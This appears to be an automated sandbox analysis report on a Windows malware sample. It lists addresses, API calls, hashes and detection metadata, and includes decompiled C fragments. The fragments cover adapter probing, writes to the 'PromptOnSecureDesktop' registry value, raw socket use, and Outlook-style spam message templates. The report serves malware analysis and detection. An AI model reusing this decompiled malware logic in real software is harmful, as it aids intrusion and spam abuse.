                                                                                                                                  0x0040874b
                                                                                                                                  0x0040862c
                                                                                                                                  0x00408633
                                                                                                                                  0x00408638
                                                                                                                                  0x00408639
                                                                                                                                  0x00408644
                                                                                                                                  0x00408647
                                                                                                                                  0x0040864a
                                                                                                                                  0x0040864c
                                                                                                                                  0x00408671
                                                                                                                                  0x00408683
                                                                                                                                  0x0040868c
                                                                                                                                  0x00408693
                                                                                                                                  0x0040869f
                                                                                                                                  0x004086a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x00408657
                                                                                                                                  0x0040865d
                                                                                                                                  0x00408660
                                                                                                                                  0x00408663
                                                                                                                                  0x00408666
                                                                                                                                  0x0040866c
                                                                                                                                  0x0040866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x004085da
                                                                                                                                  0x004085df
                                                                                                                                  0x004085e2
                                                                                                                                  0x004085e5
                                                                                                                                  0x004085eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085ed
                                                                                                                                  0x004085ef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085f4
                                                                                                                                  0x004085fa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408601
                                                                                                                                  0x00408606
                                                                                                                                  0x00408609
                                                                                                                                  0x0040860f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040860f
                                                                                                                                  0x004083c2
                                                                                                                                  0x004083df
                                                                                                                                  0x004083e2
                                                                                                                                  0x004083e5
                                                                                                                                  0x004083ea
                                                                                                                                  0x004083f3
                                                                                                                                  0x004083f9
                                                                                                                                  0x004083fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408414
                                                                                                                                  0x0040841a
                                                                                                                                  0x0040841c
                                                                                                                                  0x0040842d
                                                                                                                                  0x0040843e
                                                                                                                                  0x00408441
                                                                                                                                  0x00408447
                                                                                                                                  0x0040844a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040844a
                                                                                                                                  0x0040841e
                                                                                                                                  0x00408421
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408423
                                                                                                                                  0x00408426
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408428
                                                                                                                                  0x0040842b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040842b
                                                                                                                                  0x0040838d

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                                                                  • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                                                                  • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                                                                  • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseOpenQuery
                                                                                                                                  • String ID: PromptOnSecureDesktop$localcfg
                                                                                                                                  • API String ID: 237177642-1678164370
                                                                                                                                  • Opcode ID: e16cdcce0ac22d73867edb43c1fef29eb70daba9e4796f121648f2b303b8506c
                                                                                                                                  • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                                                                  • Opcode Fuzzy Hash: e16cdcce0ac22d73867edb43c1fef29eb70daba9e4796f121648f2b303b8506c
                                                                                                                                  • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004151F7 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 382COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___check_float_string$__inc$_isdigit$__filbuf
                                                                                                                                  • String ID: +
                                                                                                                                  • API String ID: 2300710676-2126386893
                                                                                                                                  • Opcode ID: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
                                                                                                                                  • Instruction ID: 3027c3f7f7f7b209974f4d897e9ad327b7b2965923b83da4b714fa7d9bf2a412
                                                                                                                                  • Opcode Fuzzy Hash: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
                                                                                                                                  • Instruction Fuzzy Hash: 44F172B5D00659DBCF14DFA9CC90AEEBB75BF84304F14829AD81A67302D739AA80CF55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040199C Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}
















                                                                                                                                  0x004019ab
                                                                                                                                  0x004019ae
                                                                                                                                  0x004019b1
                                                                                                                                  0x004019bc
                                                                                                                                  0x004019c5
                                                                                                                                  0x004019c7
                                                                                                                                  0x004019cc
                                                                                                                                  0x004019ea
                                                                                                                                  0x004019f7
                                                                                                                                  0x004019f9
                                                                                                                                  0x004019fe
                                                                                                                                  0x00401ab6
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a14
                                                                                                                                  0x00401a1b
                                                                                                                                  0x00401a1d
                                                                                                                                  0x00401a23
                                                                                                                                  0x00401a28
                                                                                                                                  0x00401abc
                                                                                                                                  0x00401abc
                                                                                                                                  0x00401abe
                                                                                                                                  0x00000000
                                                                                                                                  0x00401abe
                                                                                                                                  0x00401a3c
                                                                                                                                  0x00401a40
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a45
                                                                                                                                  0x00401a46
                                                                                                                                  0x00401a47
                                                                                                                                  0x00401a50
                                                                                                                                  0x00401a60
                                                                                                                                  0x00401a60
                                                                                                                                  0x00401a67
                                                                                                                                  0x00401aa1
                                                                                                                                  0x00401aa4
                                                                                                                                  0x00401aad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401aaf
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a69
                                                                                                                                  0x00401a6c
                                                                                                                                  0x00401a6d
                                                                                                                                  0x00401a73
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a75
                                                                                                                                  0x00401a77
                                                                                                                                  0x00401a82
                                                                                                                                  0x00401a86
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a96
                                                                                                                                  0x00401a9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a9b
                                                                                                                                  0x00401a91
                                                                                                                                  0x00401a93
                                                                                                                                  0x00401a93
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a91
                                                                                                                                  0x00401a67
                                                                                                                                  0x004019fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                                                                  • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                                                                  • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                                                                  • API String ID: 835516345-270533642
                                                                                                                                  • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                                                                  • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD858F Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 00AD865A
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 00AD867B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 00AD86A8
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00AD86B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseOpenQuery
                                                                                                                                  • String ID: "$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 237177642-3108538426
                                                                                                                                  • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                                                                  • Instruction ID: 91b97e6e4d0c3d0e0bb4e78f86b339f65db68fdf311229bf1cb0a86abb29b4e0
                                                                                                                                  • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                                                                  • Instruction Fuzzy Hash: 16C1A271900108BEEB11EBA4DD85EEF7BBCEB18340F144077F606E6251EB748E949B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D459 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 368COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                  • String ID: -$9
                                                                                                                                  • API String ID: 3451365851-1631151375
                                                                                                                                  • Opcode ID: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction ID: 47dd038e71b6e8d87cef41845c8892bd9c182dcfcc000af15c34b3d9f0a9e589
                                                                                                                                  • Opcode Fuzzy Hash: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction Fuzzy Hash: D3F14DB1E052299FDB24CF58DC89BEEB7B1BB44304F5481DAE019A7281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7CB Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 365COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3455034128-2366072709
                                                                                                                                  • Opcode ID: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction ID: 06cf0195d11e21c04b465d4908b5bf6feeea47427d092b283015566512795ab7
                                                                                                                                  • Opcode Fuzzy Hash: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction Fuzzy Hash: 5DF16BF1E002299FDB24CF46DC81BAEB7B5BB85304F54449AE209A7241D738AE84CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD14E7 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00AD1601
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 00AD17D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $<$@$D
                                                                                                                                  • API String ID: 1628651668-1974347203
                                                                                                                                  • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                                                                  • Instruction ID: f4bb3e7d9452a23ee40dbb63290068a379ee1af0943ff49b39cb3b97b741351b
                                                                                                                                  • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                                                                  • Instruction Fuzzy Hash: ABF18CB5608341AFD720CF64C898BABB7F5FB88304F10892EF596973A0D7B49944CB56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD7666 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00AD76D9
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 00AD7757
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 00AD778F
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 00AD78B4
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD794E
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00AD796D
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD797E
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD79AC
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD7A56
                                                                                                                                    • Part of subcall function 00ADF40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,00AD772A,?), ref: 00ADF414
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00AD79F6
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD7A4D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3433985886-3108538426
                                                                                                                                  • Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                                                                  • Instruction ID: 9419d04d5f39f1f0e2767a23e283965e6075d2c5f6c206c05449313adcf8c525
                                                                                                                                  • Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                                                                  • Instruction Fuzzy Hash: 25C1AF72904209AFDB25DBA4DD45FEE7BB9AF49310F1000A7F506E6291FB719E84CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD2CC9 Relevance: 21.2, APIs: 14, Instructions: 194memorynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00AD2CED
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00AD2D07
                                                                                                                                  • htons.WS2_32(00000000), ref: 00AD2D42
                                                                                                                                  • select.WS2_32 ref: 00AD2D8F
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 00AD2DB1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00AD2E62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 127016686-0
                                                                                                                                  • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                                                                  • Instruction ID: af1f69dde030ba7b9d844e8f9071c5fdebb94d110a6a763bae4d58c14e7e905f
                                                                                                                                  • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                                                                  • Instruction Fuzzy Hash: F161E371504305ABC320AF64DC08B6BBBF8FB68741F14481AF98697251DBB5DC80DBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                                                                  0x0040ad89
                                                                                                                                  0x0040ad8a
                                                                                                                                  0x0040ad98
                                                                                                                                  0x0040ada6
                                                                                                                                  0x0040adba
                                                                                                                                  0x0040adc6
                                                                                                                                  0x0040adcb
                                                                                                                                  0x0040add5
                                                                                                                                  0x0040adeb
                                                                                                                                  0x0040add7
                                                                                                                                  0x0040addd
                                                                                                                                  0x0040ade6
                                                                                                                                  0x0040ade6
                                                                                                                                  0x0040adf5
                                                                                                                                  0x0040adfe
                                                                                                                                  0x0040ae03
                                                                                                                                  0x0040ae0f
                                                                                                                                  0x0040ae18
                                                                                                                                  0x0040ae1b
                                                                                                                                  0x0040ae7f
                                                                                                                                  0x0040ae81
                                                                                                                                  0x0040ae83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ae31
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae43
                                                                                                                                  0x0040ae4f
                                                                                                                                  0x0040ae5e
                                                                                                                                  0x0040ae6e
                                                                                                                                  0x0040ae73
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040aea5
                                                                                                                                  0x0040aeb6
                                                                                                                                  0x0040aedc

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                                                                    • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                    • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                    • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                                                                    • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                                                                  • wsprintfA.USER32 ref: 0040AEA5
                                                                                                                                    • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE4F
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE5E
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                                                                  • API String ID: 3631595830-1816598006
                                                                                                                                  • Opcode ID: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                                                                  • Opcode Fuzzy Hash: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                                                                  Uniqueness

